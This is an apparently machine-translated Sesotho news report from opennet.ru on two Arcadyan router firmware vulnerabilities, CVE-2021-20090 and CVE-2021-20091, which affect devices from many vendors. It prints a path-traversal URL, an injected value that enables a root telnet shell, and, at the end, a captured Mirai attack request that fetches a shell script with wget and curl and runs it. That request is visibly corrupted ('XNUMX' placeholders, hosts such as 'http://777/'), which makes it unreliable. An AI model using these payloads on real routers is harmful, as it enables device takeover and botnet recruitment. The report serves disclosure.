Tlhaselo e kholo e tlalehiloe marang-rang khahlanong le li-routers tsa lapeng tseo firmware ea tsona e sebelisang ts'ebetso ea seva sa HTTP ho tsoa k'hamphaning ea Arcadyan. Ho fumana taolo holim'a lisebelisoa, ho sebelisoa mefokolo e 'meli e lumellang ho etsoa ka mokhoa o ikhethileng oa khoutu e nang le litokelo tsa metso. Bothata bo ama mefuta e mengata e fapaneng ea li-routers tsa ADSL tse tsoang Arcadyan, ASUS le Buffalo, hammoho le lisebelisoa tse fanoeng tlas'a lihlahisoa tsa Beeline (bothata bo tiisitsoe ho Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone le basebetsi ba bang ba telecom. Hoa hlokomeloa hore bothata bo bile teng ho Arcadyan firmware ka lilemo tse fetang 10 'me nakong ena e khonne ho fallela bonyane ho mehlala ea lisebelisoa tsa 20 ho tloha ho bahlahisi ba fapaneng ba 17.
Kotsi ea pele, CVE-2021-20090, e etsa hore ho khonehe ho fihlella mongolo ofe kapa ofe oa sebopeho sa webo ntle le netefatso. Taba ea bofokoli ke hore sehokelong sa marang-rang, litsamaiso tse ling tseo ka tsona litšoantšo, lifaele tsa CSS le mangolo a JavaScript li romelloang li fumaneha ntle le netefatso. Tabeng ena, li-directory tseo ho kena ho tsona ntle le bopaki li lumelloang li hlahlojoa ho sebelisoa mask a pele. Ho hlakisa litlhaku tsa "../" litseleng tsa ho ea bukeng ea motsoali ho koetsoe ke firmware, empa ho sebelisa motsoako oa "..%2f" ho tlōtsoe. Kahoo, hoa khoneha ho bula maqephe a sirelelitsoeng ha u romela likōpo tse kang "http://192.168.1.1/images/..%2findex.htm".
Kotsi ea bobeli, CVE-2021-20091, e lumella mosebelisi ea netefalitsoeng ho etsa liphetoho ho litlhophiso tsa sistimi ea sesebelisoa ka ho romella liparamente tse hlophisitsoeng ka mokhoa o ikhethileng ho sengoloa sa apply_abstract.cgi, se sa hlahlobeng boteng ba sebapali se secha ho li-parameter. . Ka mohlala, ha ho etsoa ts'ebetso ea ping, mohlaseli a ka hlalosa boleng "192.168.1.2%0AARC_SYS_TelnetdEnable=1" tšimong e nang le aterese ea IP e hlahlojoang, le script, ha ho etsoa faele ea litlhophiso /tmp/etc/config/ .glbcfg, e tla ngola mola "AARC_SYS_TelnetdEnable=1" ho eona ", e kenyang mohala oa telnetd, o fanang ka phihlello e sa lekanyetsoang ea khetla e nang le litokelo tsa metso. Ka mokhoa o ts'oanang, ka ho beha paramente ea AARC_SYS, o ka etsa khoutu efe kapa efe ho sistimi. Bofokoli ba pele bo etsa hore ho khonehe ho tsamaisa mongolo o nang le bothata ntle le netefatso ka ho o fumana joalo ka "/images/..%2fapply_abstract.cgi".
Ho sebelisa bofokoli, mohlaseli o tlameha ho khona ho romela kopo boema-kepeng ba marang-rang moo sebopeho sa marang-rang se sebetsang ho sona. Ho latela matla a ho ata ha tlhaselo, basebelisi ba bangata ba tlohela ho fihlella lisebelisoa tsa bona ho tloha marang-rang a ka ntle ho nolofatsa ho hlahlojoa ha mathata ka tšebeletso ea tšehetso. Haeba ho fihlella sebopeho sa marang-rang ho lekanyelitsoe feela marang-rang a ka hare, tlhaselo e ka etsoa ho tsoa marang-rang a kantle ho sebelisoa mokhoa oa "DNS rebinding". Bofokoli bo se bo ntse bo sebelisoa ka matla ho hokela li-routers ho Mirai botnet: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Connection: close User-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC=212.192.241.7_ping0 1%0A ARC_SYS_TelnetdEnable=212.192.241.72& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://777/lolol.sh; curl+-O+http://0/lolol.sh; chmod+4+lolol.sh; sh+lolol.sh&ARC_ping_status=XNUMX&TMP_Ping_Type=XNUMX
Source: opennet.ru